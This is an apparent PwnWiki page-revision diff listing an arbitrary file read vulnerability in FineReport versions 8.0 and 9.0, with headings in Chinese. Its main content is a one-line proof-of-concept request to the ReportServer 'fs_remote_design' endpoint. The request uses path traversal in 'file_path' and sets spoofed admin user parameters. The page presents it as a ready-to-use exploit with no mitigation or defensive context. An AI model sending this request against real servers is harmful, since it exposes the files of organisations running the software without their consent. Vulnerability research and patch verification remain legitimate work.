Difference between revisions of "FineReport v8.0 - 9.0 任意文件讀取漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> FineReport v8.0 FineReport v9.0 </pre> ==POC== <pre> http://<target>/WebReport/ReportServer?op=fs_remote_design&...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>

Latest revision as of 21:00, 12 June 2021

Other languages:

漏洞影響

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true